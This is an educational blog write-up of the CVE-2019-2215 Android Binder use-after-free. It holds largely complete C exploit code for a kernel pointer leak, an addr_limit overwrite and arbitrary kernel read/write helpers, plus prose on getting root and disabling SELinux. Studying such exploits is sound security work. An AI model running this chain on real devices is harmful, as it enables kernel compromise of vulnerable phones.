Analyzing Android's CVE-2019-2215 (/dev/binder UAF)
Over the past few weeks, those of you who frequent the DAY[0] streams over on our Twitch may have seen me working on trying to understand the recent Android Binder Use-After-Free (UAF) published by Google's Project Zero (p0). This bug is actually not new; the issue was discovered and fixed in the mainline kernel in February 2018. However, p0 discovered that many popular devices never received the patch downstream, including the Pixel 2, the Huawei P20, and Samsung Galaxy S7, S8, and S9 phones. I believe many of these devices received security patches within the last couple of weeks that finally killed the bug.
After a few streams of poking around with a kernel debugger on a virtual machine (running Android-x86), and testing with a vulnerable Pixel 2, I've come to understand the exploit written by Jann Horn and Maddie Stone pretty well. Without an understanding of Binder (the binder_thread object specifically), as well as how Vectored I/O works, the exploit can be pretty confusing. It's also quite clever how they exploited this issue, so I thought it would be cool to write up how the exploit works.
We'll mostly be focusing on how an arbitrary read/write primitive is established; we won't focus on the post-exploit stuff such as disabling SELinux and enabling full root capabilities, as there are quite a few write-ups out there already that cover that. Here's a brief overview of what this article will cover:
- Basic overview of Binder and Vectored I/O
- Vulnerability details
- Leaking the kernel task struct
- Establishing an arbitrary read/write (arbitrary r/w) primitive
- Conclusion
Note that all code snippets will be from kernel v4.4.177, as this is the kernel I tested on personally.
Basic overview of Binder and Vectored I/O
Binder
The Binder driver is an Android-only driver which provides an easy method of Inter Process Communication (IPC), including Remote Procedure Calling (RPC). You will find this driver's source code in the mainline Linux kernel; however, it is not configured for non-Android builds.
There are a few different binder device drivers that are used for different types of IPC. For communication between framework and app processes using the Android Interface Definition Language (AIDL), /dev/binder is used. For communication between framework and vendor processes / hardware using the Hardware Abstraction Layer (HAL) Interface Definition Language (HIDL), /dev/hwbinder is used. Finally, for vendors who want to use IPC between vendor processes without using HIDL, /dev/vndbinder is used. For the purposes of the exploit, we only care about the first driver, /dev/binder.
Like most IPC mechanisms in Linux, binder works through file descriptors, and you can add event polls to it using the EPOLL API.
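To make this concrete, here's a minimal sketch (my own, not from the exploit - error handling omitted) of opening the binder device and registering it with an epoll instance; this is the same setup the PoC performs:
#include <fcntl.h>
#include <sys/epoll.h>
int binder_fd = open("/dev/binder", O_RDONLY);
int epfd = epoll_create(1000);
struct epoll_event event = { .events = EPOLLIN };
// Registering the fd makes epoll link a wait queue entry into the
// driver's internal binder_thread->wait waitqueue.
epoll_ctl(epfd, EPOLL_CTL_ADD, binder_fd, &event);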
Vectored I/O
Vectored I/O allows you to write into a data stream from multiple buffers, or read from a data stream into multiple buffers. It's also known as "scatter/gather I/O". Vectored I/O offers a few advantages over non-vectored I/O. For one, you can read or write using multiple non-contiguous buffers without a bunch of overhead. It's also atomic.
An example of where vectored I/O is useful is a data packet where you have a header followed by data. Using vectored I/O, you can keep the header and the data in separate, non-contiguous buffers, and read into them or write from them with one system call instead of two.
How this works is you define an array of iovec structures which describe all the buffers you'd like to use for I/O. The iovec structure is relatively small, consisting only of two QWORDs (8-byte values) on 64-bit systems.
struct iovec { // Size: 0x10
    void *iov_base; // 0x00
    size_t iov_len; // 0x08
};
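As a quick illustration (my own sketch, not part of the exploit), a header and payload kept in separate buffers can be sent with a single call:
#include <sys/uio.h>
void send_packet(int fd)
{
    char header[16];   // packet header
    char payload[128]; // packet data, non-contiguous with the header
    struct iovec iov[2] = {
        { .iov_base = header,  .iov_len = sizeof(header)  },
        { .iov_base = payload, .iov_len = sizeof(payload) },
    };
    // One atomic syscall writes both buffers, in array order.
    writev(fd, iov, 2);
}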
Vulnerability details
The Binder driver has a cleanup routine you can trigger from ioctl() before actually closing the driver. If you're familiar with drivers and cleanup routines, you can likely already guess why this can cause issues.
Let's look at the p0 report summary.
As described in the upstream commit:
“binder_poll() passes the thread->wait waitqueue that
can be slept on for work. When a thread that uses
epoll explicitly exits using BINDER_THREAD_EXIT,
the waitqueue is freed, but it is never removed
from the corresponding epoll data structure. When
the process subsequently exits, the epoll cleanup
code tries to access the waitlist, which results in
a use-after-free.”
This summary is a bit misleading. The use-after-free is not on the waitqueue itself. The waitqueue is an inline struct in the binder_thread structure; the binder_thread object is what's actually UAF'd. The reason they mention the waitqueue directly in this commit summary is that this issue was originally found by Google's Syzkaller fuzzer back in 2017, and the fuzzer triggered a use-after-free detected by the Kernel Address Sanitizer (KASAN) on the waitqueue's spinlock.
The free
Let's take a look at the ioctl command in question, BINDER_THREAD_EXIT.
static long binder_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
// [...]
switch (cmd) {
// [...]
case BINDER_THREAD_EXIT:
binder_debug(BINDER_DEBUG_THREADS, "%d:%d exit\n",
proc->pid, thread->pid);
binder_free_thread(proc, thread);
thread = NULL;
break;
// [...]
}
}
// [...]
static int binder_free_thread(struct binder_proc *proc,
struct binder_thread *thread)
{
struct binder_transaction *t;
struct binder_transaction *send_reply = NULL;
int active_transactions = 0;
// [...]
while (t) {
active_transactions++;
// [...]
}
if (send_reply)
binder_send_failed_reply(send_reply, BR_DEAD_REPLY);
binder_release_work(&thread->todo);
kfree(thread);
binder_stats_deleted(BINDER_STAT_THREAD);
return active_transactions;
}
The critical line of code here is kfree(thread) (line 2610 in the kernel source). This is where the "free" part of the use-after-free happens.
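From userland, the whole bug boils down to two more calls on top of the epoll setup shown earlier (this mirrors the p0 PoC; the BINDER_THREAD_EXIT value below is the ioctl number from the public PoC):
#include <sys/ioctl.h>
#define BINDER_THREAD_EXIT 0x40046208ul
ioctl(binder_fd, BINDER_THREAD_EXIT, 0); // kfree(thread) - the "free"
close(epfd); // epoll cleanup walks the stale waitqueue - the "use"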
The use (after free)
Now that we've seen where the free happens, let's try to see where the use happens. The stack trace from the KASAN report will be helpful for this.
Call Trace:
...
_raw_spin_lock_irqsave+0x96/0xc0 kernel/locking/spinlock.c:159
remove_wait_queue+0x81/0x350 kernel/sched/wait.c:50
ep_remove_wait_queue fs/eventpoll.c:595 [inline]
ep_unregister_pollwait.isra.7+0x18c/0x590 fs/eventpoll.c:613
ep_free+0x13f/0x320 fs/eventpoll.c:830
ep_eventpoll_release+0x44/0x60 fs/eventpoll.c:862
...
At first, it can be a bit confusing because the binder_thread object is referenced indirectly, i.e. if you ctrl+F for binder_thread you won't find any occurrences. However, if we quickly look at ep_unregister_pollwait():
static void ep_unregister_pollwait(struct eventpoll *ep, struct epitem *epi)
{
struct list_head *lsthead = &epi->pwqlist;
struct eppoll_entry *pwq;
while (!list_empty(lsthead)) {
pwq = list_first_entry(lsthead, struct eppoll_entry, llink);
list_del(&pwq->llink);
ep_remove_wait_queue(pwq);
kmem_cache_free(pwq_cache, pwq);
}
}
We'll notice our free'd binder_thread comes into play through the eppoll_entry structures in this linked list: each entry that ends up in pwq holds a pointer (whead) into the waitqueue embedded in our free'd object.
static void ep_remove_wait_queue(struct eppoll_entry *pwq)
{
wait_queue_head_t *whead;
rcu_read_lock();
/*
* If it is cleared by POLLFREE, it should be rcu-safe.
* If we read NULL we need a barrier paired with
* smp_store_release() in ep_poll_callback(), otherwise
* we rely on whead->lock.
*/
whead = smp_load_acquire(&pwq->whead);
if (whead)
remove_wait_queue(whead, &pwq->wait);
rcu_read_unlock();
}
We can see that pwq is used in two places. One is whead, the head of the wait queue list - the pointer into our free'd binder_thread. The other is pwq's own wait queue entry, which gets unlinked via remove_wait_queue.
At first glance it seems both arguments to remove_wait_queue should be relatively close in memory, but the smp_load_acquire() macro needs to be considered. This macro is a memory barrier. Initially I assumed it just added some compiler machinery for atomic access to whead, but this was a mistake. What's not entirely obvious is that the smp_load_acquire() macro dereferences what's passed to it. So what I originally read as whead = &pwq->whead is actually more like whead = *(wait_queue_head_t **)&pwq->whead, or more simply, whead = pwq->whead.
Let's look at remove_wait_queue().
// WRITE-UP COMMENT: q points into stale data / the UAF object
void remove_wait_queue(wait_queue_head_t *q, wait_queue_t *wait)
{
unsigned long flags;
spin_lock_irqsave(&q->lock, flags);
__remove_wait_queue(q, wait);
spin_unlock_irqrestore(&q->lock, flags);
}
When the head of the linked list ends up being our UAF'd binder_thread, q points to stale data. This is why a KASAN crash occurs on the spinlock - it will attempt to take the lock on q, which is free'd memory.
On normal devices not using KASAN instrumentation, if you run the Proof-of-Concept (PoC) as-is, you likely won't notice anything. It's highly likely that no crash will occur, which may lead you to (incorrectly) assume the device is not vulnerable. This is because it is very likely q still points to valid, stale heap data. However, if you perform a heap spray of 0x41's, you will trigger a CPU stall, which will cause your device to freeze.
This is because a spinlock is essentially just an integer that's set to either 0 (for unlocked) or a non-zero value (for locked). Technically, if the lock is set to any value that's not zero, it's considered locked. Because an attacker-controlled heap spray will essentially lock the spinlock without going through proper channels, the lock will never be released, which will cause a deadlock and freeze the device.
It's worth noting this object resides in the kmalloc-512 cache, which is a pretty decent cache for exploitation because it's not used as heavily by background processes compared to smaller caches. On kernel v4.4.177, the object is 0x190 (400) bytes in size. Because this size sits well above 256 bytes but comfortably below 512 - leaving room for the structure to vary between builds without changing caches - it's a fair assumption that this object ends up in the kmalloc-512 cache on most if not all devices.
Leaking the kernel task struct
Weaponizing an unlink
The way this vulnerability was exploited was quite clever. The exploit takes advantage of a linked list unlink operation, which can be used to corrupt an overlapped object with linked list metadata.
Assuming the spinlock doesn't deadlock on a corrupted lock value, eventually ep_remove_wait_queue() will reach a pwq->wait entry whose links point into our UAF'd object. Consider what remove_wait_queue(), and inevitably __remove_wait_queue(), does on this structure:
// WRITE-UP COMMENT: old points to stale data / the UAF object
static inline void
__remove_wait_queue(wait_queue_head_t *head, wait_queue_t *old)
{
list_del(&old->task_list);
}
// ...
static inline void list_del(struct list_head *entry)
{
__list_del(entry->prev, entry->next);
entry->next = LIST_POISON1;
entry->prev = LIST_POISON2;
}
// ...
static inline void __list_del(struct list_head * prev, struct list_head * next)
{
next->prev = prev;
WRITE_ONCE(prev->next, next);
}
The main line of importance here is next->prev = prev. This is essentially an unlink, and it writes a pointer to the previous element into our UAF'd object.
This is useful because if we overlap another kernel object on top of our UAF'd object, we can weaponize this unlink to corrupt data in the overlapped object. This is what p0 used to leak kernel data. Which object is a good candidate for this attack strategy? Enter iovec.
There are a few properties of the iovec structure that make it a really good candidate for exploitation here.
- They're small (0x10 in size on 64-bit machines) and you can control all the fields with very few restrictions
- You can stack them, and thus control which kmalloc cache your iovec stack ends up in by how many you write with
- They have a pointer (iov_base) which is a perfect field to corrupt with the unlink
Under normal circumstances, iov_base is checked in the kernel anywhere it's used: the kernel will first ensure that iov_base is a userland pointer before processing the request. However, using the unlink primitive we just talked about, we can corrupt this pointer post-validation and overwrite it with a kernel pointer - namely the prev pointer from the unlink operation.
This means when we read from a descriptor that was written to with the corrupted iovec, we'll be reading data originating from a kernel pointer, not a userland one as intended. This will allow us to leak kernel data relative to the prev pointer, which contains pointers useful enough to allow for arbitrary read/write as well as code execution.
The tricky step of this process is figuring out which iovec's index lines up with the waitqueue. This is important because if we don't fake the lock properly, the device will hang and we won't be able to have any fun on it.
Finding the offset of the waitqueue is fairly easy if you have a kernel image of the version you're targeting. By looking at a function that uses the waitqueue field of binder_thread, we can easily find the offset in the disassembly. One such function is binder_wakeup_thread_ilocked(), which calls wake_up_interruptible_sync(&thread->wait). The offset is visible where the address is loaded into the X0 register just before the call.
.text:0000000000C0E2B4 ADD X0, X8, #0xA0
.text:0000000000C0E2B8 MOV W1, #1
.text:0000000000C0E2BC MOV W2, #1
.text:0000000000C0E2C0 TBZ W19, #0, loc_C0E2CC
.text:0000000000C0E2C4 BL __wake_up_sync
On kernel v4.4.177, we can see the wait queue is 0xA0 bytes into the binder_thread object. Since iovec is 0x10 bytes in size, the iovec at index 0xA in the array will line up with the wait queue.
#define BINDER_THREAD_SZ 0x190
#define IOVEC_ARRAY_SZ (BINDER_THREAD_SZ / 16)
#define WAITQUEUE_OFFSET 0xA0
#define IOVEC_INDX_FOR_WQ (WAITQUEUE_OFFSET / 16)
So how does one pass a valid iov_base address which will pass validation while also keeping the lock at 0 to prevent a deadlock? Since the lock is only a DWORD (4 bytes), and a full 64-bit pointer overlaps it, you just need to use mmap() to map a userland address whose lower 32 bits are 0.
dummy_page = mmap((void *)0x100000000ul, 2 * PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
// ...
struct iovec iovec_array[IOVEC_ARRAY_SZ];
memset(iovec_array, 0, sizeof(iovec_array));
iovec_array[IOVEC_INDX_FOR_WQ].iov_base = dummy_page; /* spinlock in the low address half must be zero */
iovec_array[IOVEC_INDX_FOR_WQ].iov_len = 0x1000; /* wq->task_list->next */
iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_base = (void *)0xDEADBEEF; /* wq->task_list->prev */
iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len = 0x1000;
When the exploit runs, the iovec at IOVEC_INDX_FOR_WQ will take the place of the lock (its iov_base) as well as the next pointer in the linked list (its iov_len). The iovec at IOVEC_INDX_FOR_WQ + 1 will take the place of the prev pointer in the linked list (its iov_base). This means IOVEC_INDX_FOR_WQ + 1's iov_base field is the one that will be overwritten with a kernel pointer.
Let's take a look at the free'd memory in KGDB on a VM running Android-x86, before and after the unlink operation. To do this, I set a breakpoint on the call to remove_wait_queue(). The first argument will point to the free'd memory, so we'll find the pointer in the RDI register. If we examine this memory before the call, we'll see the following:
Thread 1 hit Breakpoint 11, 0xffffffff812811c2 in ep_unregister_pollwait.isra ()
gdb-peda$ x/50wx $rdi
0xffff8880959d68a0: 0x00000000 0x00000001 0x00001000 0x00000000
0xffff8880959d68b0: 0xdeadbeef 0x00000000 0x00001000 0x00000000
...
Notice the data overlaps with the iovec structures from above - for example, we can see 0xdeadbeef at 0xffff8880959d68b0. Now let's take a look at the same memory after the unlink occurs. We'll set a breakpoint at the end of ep_unregister_pollwait and examine the same memory.
Thread 1 hit Breakpoint 12, 0xffffffff812811ee in ep_unregister_pollwait.isra ()
gdb-peda$ x/50wx 0xffff8880959d68a0
0xffff8880959d68a0: 0x00000000 0x00000001 0x959d68a8 0xffff8880
0xffff8880959d68b0: 0x959d68a8 0xffff8880 0x00001000 0x00000000
...
The iov_len of the iovec at IOVEC_INDX_FOR_WQ was overwritten with a kernel pointer, and the iov_base of the iovec at IOVEC_INDX_FOR_WQ + 1 was overwritten with the same kernel pointer - thus corrupting the iovec array's backing data in the kernel heap!
Triggering the leak
It seems p0 decided to go with a pipe as the medium for the leak. The attack strategy is basically as follows:
- Create a pipe
- Trigger the free() on the binder_thread object so that the iovec structures allocated in the next step overlap it
- Write the iovec structures into binder_thread's old memory via the writev() system call on the pipe
- Trigger the use-after-free / unlink to corrupt the iovec structure
- Call read() on the pipe, which will use the uncorrupted iovec at IOVEC_INDX_FOR_WQ to read the dummy_page data
- Call read() on the pipe again, which will use the corrupted iovec at IOVEC_INDX_FOR_WQ + 1 to read kernel data into the leak buffer
Because we initialized two iovec's with an iov_len of 0x1000, the writev() call will ultimately write two pages of data. The first page will contain data from dummy_page, which isn't useful for exploitation. The second page will contain kernel data!
It's easier to handle the reads and writes in two separate processes. The parent process is responsible for:
- Triggering the free() on binder_thread
- Writing the iovec stack to the pipe shared with the child process, which will overlap the free'd binder_thread
- (Waiting on the child process)
- Reading the second page of leaked kernel data
The child process is responsible for:
- Corrupting the iovec by triggering the unlink via deletion of the EPOLL event
- Reading the first page of dummy data
When we put this all together, here's our leak code (note that functionally this is similar to p0's, except I cleaned it up a bit and ported it to an app, hence __android_log_print()):
struct epoll_event event = {.events = EPOLLIN};
struct iovec iovec_array[IOVEC_ARRAY_SZ];
char leakBuff[0x1000];
int pipefd[2];
int byteSent;
pid_t pid;
memset(iovec_array, 0, sizeof(iovec_array));
if(epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event))
exitWithError("EPOLL_CTL_ADD failed: %s", strerror(errno));
iovec_array[IOVEC_INDX_FOR_WQ].iov_base = dummy_page; // mutex
iovec_array[IOVEC_INDX_FOR_WQ].iov_len = 0x1000; // linked list next
iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_base = (void *)0xDEADBEEF; // linked list prev
iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len = 0x1000;
if(pipe(pipefd))
exitWithError("Pipe failed: %s", strerror(errno));
if(fcntl(pipefd[0], F_SETPIPE_SZ, 0x1000) != 0x1000)
exitWithError("F_SETPIPE_SZ failed: %s", strerror(errno));
pid = fork();
if(pid == 0)
{
prctl(PR_SET_PDEATHSIG, SIGKILL);
sleep(2);
epoll_ctl(epfd, EPOLL_CTL_DEL, fd, &event);
if(read(pipefd[0], leakBuff, sizeof(leakBuff)) != sizeof(leakBuff))
exitWithError("[CHILD] Read failed: %s", strerror(errno));
close(pipefd[1]);
_exit(0);
}
ioctl(fd, BINDER_THREAD_EXIT, NULL);
byteSent = writev(pipefd[1], iovec_array, IOVEC_ARRAY_SZ);
if(byteSent != 0x2000)
exitWithError("[PARENT] Leak failed: writev returned %d, expected 0x2000.", byteSent);
if(read(pipefd[0], leakBuff, sizeof(leakBuff)) != sizeof(leakBuff))
exitWithError("[PARENT] Read failed: %s", strerror(errno));
__android_log_print(ANDROID_LOG_INFO, "EXPLOIT", "leak + 0xE8 = %lx\n", *(uint64_t *)(leakBuff + 0xE8));
thread_info = *(unsigned long *)(leakBuff + 0xE8);
When we run this app, we'll get something similar to the following in logcat:
com.example.binderuaf I/EXPLOIT: leak + 0xE8 = fffffffec88c5700
This pointer points to the current process's thread_info struct. This structure has a very useful field we can leverage to get an arbitrary read/write primitive.
Establishing an arbitrary read/write (arbitrary r/w) primitive
Breaking the limits
So we've leaked a useful kernel pointer - now what? Let's take a look at the first few members of thread_info, the object whose address we're leaking.
struct thread_info {
unsigned long flags; /* low level flags */
mm_segment_t addr_limit; /* address limit */
struct task_struct *task; /* main task structure */
int preempt_count; /* 0 => preemptable, <0 => bug */
int cpu; /* cpu */
};
The field of interest here is addr_limit. There are some very important macros that reference this field in security checks. Let's look at one of them - access_ok.
#define access_ok(type, addr, size) __range_ok(addr, size)
From the comment of __range_ok() - it's essentially equivalent to (u65)addr + (u65)size <= current->addr_limit. This macro is used pretty much everywhere the kernel accesses a user-provided pointer. It's used to ensure the pointer provided is really a userland pointer, and prevents people from trying to be clever by passing kernel pointers where the kernel expects userland pointers. See where I'm going with this? :)
Once this addr_limit is smashed, you can freely pass kernel pointers where userland pointers are expected, and access_ok() will never fail.
Getting a controlled write primitive
We've already demonstrated we can use the unlink to read and leak kernel data - but what about modifying it? Turns out we can do that too! To leak kernel data, we wrote non-contiguously into a file descriptor with a stack of iovec structures, and corrupted one of them with the unlink so that a read() call later on would leak data.
To corrupt kernel data, we go the other way. By calling recvmsg() with a stack of iovec structures and corrupting it the same way, we can force the data we write using write() to be copied over the subsequent iovec structures, getting an arbitrary write.
Let's look at the iovec stack we slot into our UAF'd object with recvmsg().
iovec_array[IOVEC_INDX_FOR_WQ].iov_base = dummy_page; // mutex
iovec_array[IOVEC_INDX_FOR_WQ].iov_len = 1; // linked list next
iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_base = (void *)0xDEADBEEF; // linked list prev
iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len = 0x8 + 2 * 0x10; // iov_len of previous, then this element and next element
iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_base = (void *)0xBEEFDEAD;
iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_len = 8;
Just like the infoleak case, the unlink corrupts the iov_len of the iovec at IOVEC_INDX_FOR_WQ and the iov_base of the iovec at IOVEC_INDX_FOR_WQ + 1 with a kernel pointer. This kernel pointer isn't just pointing into some random data somewhere - if we take a look at the KGDB output again, we'll notice it points to the iov_len of the iovec at IOVEC_INDX_FOR_WQ! The difference this time is that instead of leaking data out through these iovec structures, we're feeding controlled data in through them.
Once recvmsg() reaches this iovec, it will start copying the data we wrote with write() to this pointer - which allows us to write arbitrary data into the following iovec structs post-validation. This lets us place any pointer we want into the iov_base of the next iovec - giving us an arbitrary write. We control what gets written to this address with the trailing QWORD of the write().
If we look at the data that gets written, we can indeed see that it lines up with the backing data of the iovec stack, from the iov_len at IOVEC_INDX_FOR_WQ onwards.
unsigned long second_write_chunk[] = {
1, /* iov_len */
0xdeadbeef, /* iov_base (already used) */
0x8 + 2 * 0x10, /* iov_len (already used) */
current_ptr + 0x8, /* next iov_base (addr_limit) */
8, /* next iov_len (sizeof(addr_limit)) */
0xfffffffffffffffe /* value to write */
};
The attack strategy is as follows:
- Create a socketpair
- Trigger the free() on the binder_thread object so that recvmsg()'s iovec stack overlaps binder_thread
- Preemptively write 1 byte to satisfy the first iovec
- Write the iovec structures into binder_thread's old memory via recvmsg()
- Trigger the use-after-free / unlink to corrupt the iovec structure
- Call write() on the socketpair, which will use the corrupted iovec to corrupt the next iovec, giving a controlled memory corruption
Again, just like the leak, two processes are needed. The parent process is responsible for:
- Preemptively writing 1 byte of data to satisfy recvmsg()'s first iovec request
- Triggering the free() on binder_thread
- Writing the iovec stack to the socket and waiting on data that matches the iovec requests via recvmsg()
The child process is responsible for:
- Corrupting the iovec by triggering the unlink via deletion of the EPOLL event
- Writing the data that will corrupt the subsequent iovec structures when the parent's recvmsg() call continues
Putting this all together, we end up with the following code to smash the parent process's addr_limit. Again, functionally this code is the same as p0's, however it's cleaned up and uses JNI functions.
#define OFFSET_OF_ADDR_LIMIT 8
struct epoll_event event = {.events = EPOLLIN};
struct iovec iovec_array[IOVEC_ARRAY_SZ];
int iovec_corruption_payload_sz;
int sockfd[2];
int byteSent;
pid_t pid;
memset(iovec_array, 0, sizeof(iovec_array));
if(epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event))
exitWithError("EPOLL_CTL_ADD failed: %s", strerror(errno));
unsigned long iovec_corruption_payload[] = {
1, // IOVEC_INDX_FOR_WQ -> iov_len
0xdeadbeef, // IOVEC_INDX_FOR_WQ + 1 -> iov_base
0x8 + (2 * 0x10), // IOVEC_INDX_FOR_WQ + 1 -> iov_len
thread_info + OFFSET_OF_ADDR_LIMIT, // Arb. write location! IOVEC_INDX_FOR_WQ + 2 -> iov_base
8, // Arb. write size (only need a QWORD)! IOVEC_INDX_FOR_WQ + 2 -> iov_len
0xfffffffffffffffe, // Arb. Write value! Smash it so we can write anywhere.
};
iovec_corruption_payload_sz = sizeof(iovec_corruption_payload);
iovec_array[IOVEC_INDX_FOR_WQ].iov_base = dummy_page; // mutex
iovec_array[IOVEC_INDX_FOR_WQ].iov_len = 1; // only ask for one byte since we'll only write one byte - linked list next
iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_base = (void *)0xDEADBEEF; // linked list prev
iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len = 0x8 + 2 * 0x10; // length of previous iovec + this one + the next one
iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_base = (void *)0xBEEFDEAD; // will get smashed by iovec_corruption_payload
iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_len = 8;
if(socketpair(AF_UNIX, SOCK_STREAM, 0, sockfd))
exitWithError("Socket pair failed: %s", strerror(errno));
// Preemptively satisfy the first iovec request
if(write(sockfd[1], "X", 1) != 1)
exitWithError("Write 1 byte failed: %s", strerror(errno));
pid = fork();
if(pid == 0)
{
prctl(PR_SET_PDEATHSIG, SIGKILL);
sleep(2);
epoll_ctl(epfd, EPOLL_CTL_DEL, fd, &event);
byteSent = write(sockfd[1], iovec_corruption_payload, iovec_corruption_payload_sz);
if(byteSent != iovec_corruption_payload_sz)
exitWithError("[CHILD] Write returned %d, expected %d.", byteSent, iovec_corruption_payload_sz);
_exit(0);
}
ioctl(fd, BINDER_THREAD_EXIT, NULL);
struct msghdr msg = {
.msg_iov = iovec_array,
.msg_iovlen = IOVEC_ARRAY_SZ
};
recvmsg(sockfd[0], &msg, MSG_WAITALL);
Arbitrary Read/Write Helper Functions
Now that the process address limit has been smashed, arbitrary kernel read/write is as simple as a few read() and write() syscalls. By writing the data we want into a pipe with write(), and then calling read() on the other end of the pipe with a kernel address as the destination buffer, we can pipe data to an arbitrary kernel address.
Conversely, by write()'ing from an arbitrary kernel address into a pipe, and calling read() on the other end, we can pipe data out from an arbitrary kernel address. Boom, arbitrary read/write!
int kernel_rw_pipe[2];
//...
if(pipe(kernel_rw_pipe))
exitWithError("Kernel R/W Pipe failed: %s", strerror(errno));
//...
void kernel_write(unsigned long kaddr, void *data, size_t len)
{
if(len > 0x1000)
exitWithError("Reads/writes over the size of a page results causes issues.");
if(write(kernel_rw_pipe[1], data, len) != len)
exitWithError("Failed to write data to kernel (write)!");
if(read(kernel_rw_pipe[0], (void *)kaddr, len) != len)
exitWithError("Failed to write data to kernel (read)!");
}
void kernel_read(unsigned long kaddr, void *data, size_t len)
{
if(len > 0x1000)
exitWithError("Reads/writes over the size of a page results causes issues.");
if(write(kernel_rw_pipe[1], (void *)kaddr, len) != len)
exitWithError("Failed to read data from kernel (write)!");
if(read(kernel_rw_pipe[0], data, len) != len)
exitWithError("Failed to read data from kernel (read)!");
}
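A quick sanity check (my own addition, in the same spirit as p0's exploit) is to read addr_limit back through the new primitive and confirm it holds the value we smashed it with:
unsigned long addr_limit;
kernel_read(thread_info + OFFSET_OF_ADDR_LIMIT, &addr_limit, sizeof(addr_limit));
// Should log fffffffffffffffe if the arbitrary r/w is working.
__android_log_print(ANDROID_LOG_INFO, "EXPLOIT", "addr_limit = %lx\n", addr_limit);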
Additional Notes
Some devices (even if they're vulnerable) may fail on the writev() in the leak step, as it'll return 0x1000 instead of the desired 0x2000. This is usually because the offset for the waitqueue is incorrect, and therefore the second iovec's iov_base isn't getting smashed with a kernel pointer. The call returns 0x1000 because the second request fails, since 0xdeadbeef is an unmapped address.
In this case, you'll have to extract the kernel image for the version you're targeting and pull the proper offsets (or potentially bruteforce them).
Conclusion
Once you have kernel read/write, it's basically game over. A root shell is a cred patch away. If you're not on a Samsung device, you can take it a step further: disable SELinux and patch the init_task credentials so that every new process launched post-exploit automatically runs with full privileges. On Samsung devices, I do not believe this is possible without extra work due to their Knox mitigations; on most other devices, though, these additional patches shouldn't be an issue.
It's worth noting that p0's exploit is remarkably stable. It very rarely fails, and when it does it's usually just an error, not a kernel panic, so you just need to run the exploit again and you're good to go. This makes it an awesome temporary root method for people with OEM locked bootloaders like me.
Overall, I thought this exploit strategy by Jann Horn and Maddie Stone was pretty novel, and I definitely learned a lot breaking it down. It gave me a fresh perspective on use-after-frees, demonstrating that you're not totally out of luck if you can't get a useful primitive from the UAF'd object itself.
References / Additional Resources
Issue 1942: Android; Use-After-Free in Binder driver (Chromium Bug Tracker)
Bootlin Linux kernel source browser
Credit
Jann Horn and Maddie Stone for the exploit code referenced in the write-up.